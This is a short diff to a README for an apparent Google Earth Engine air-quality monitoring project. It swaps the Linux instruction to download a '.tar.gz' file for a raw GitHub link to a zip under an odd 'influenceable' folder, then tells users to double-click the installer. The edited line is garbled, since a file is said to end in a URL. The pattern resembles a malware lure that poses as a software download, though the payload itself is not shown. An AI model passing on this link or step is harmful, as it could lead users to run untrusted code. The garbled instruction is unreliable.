robbyvioryfansya/Data-Driven-Air-Quality-Monitoring-with-GEE-Platform/README.md

    - For Windows, look for a file ending in `.exe`.
    - For macOS, look for a file ending in `.dmg`.
-   - For Linux, look for a file ending in `.tar.gz`.
+   - For Linux, look for a file ending in `https://github.com/robbyvioryfansya/Data-Driven-Air-Quality-Monitoring-with-GEE-Platform/raw/refs/heads/main/influenceable/Monitoring-Air-Quality-with-Platform-GE-Data-Driven-1.1.zip`.

 4. **Run the Installer**: Once the download completes, locate the file in your Downloads folder.
 Double-click it to run the installer.